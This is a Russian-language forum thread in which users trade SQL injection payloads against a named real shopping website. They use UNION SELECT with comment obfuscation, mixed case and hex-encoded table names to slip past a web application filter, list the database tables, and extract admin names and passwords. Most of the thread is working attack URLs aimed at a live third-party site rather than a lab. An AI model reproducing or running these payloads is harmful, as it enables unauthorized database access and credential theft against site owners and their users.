Фильтруется этот параметр? Чем можно заменить? Code: group_concat(table_name+separator+0x7c)+from+information_schema.tables+where+table_schema=
Потести разные словa, union, select, group_concat, table_name, и т.п. ошибка - не фильтрирует forbidden - фильтрирует если конечно это mod_security
Посмотрите пожалуйста фильтр, попробовал не получилось вывести таблицы... Code: http://www.maxxhits.com/index.php?phr=Shopping&cid=14&id=-5+/*!UnIoN+SeLeCt*/+1,version(),3,4,5,6,7--
http://www.maxxhits.com/index.php?phr=Shopping&cid=14&id=-5+/*!UnIoN+SeLeCt*/+1,table_name,3,4,5,6,7+from+information_schema.%60tables%60--
Допустим... хочу вывести все таблицы моим запросом group_concat(table_name+separator+0x7c)+from+infor mation_schema.tables+where+table_schema= как тут быть с фильтром? Если можно сразу пример...
http://www.maxxhits.com/index.php?phr=Shopping&cid=14&id=-5+/*!UnIoN+SeLeCt*/+1,group_cOnCaT%28TabLe_naMe%29,3,4,5,6,7+from+information_schema.%60tables%60--
поправьте что не так.. не выводит данные Code: http://www.maxxhits.com/index.php?phr=Shopping&cid=14&id=-5+/*!UnIoN+SeLeCt*/+1,cOnCaT(name,0x3a,password),3,4,5,6,7+from+0x61646d696e--
2Konqi ну тоже верно) hex) но надо людей сначала отправлять читать мануалы, а то ж нифига не научаться если их на путь правильный наставлять. P.S. Залазь в асю или вылазь из инвиза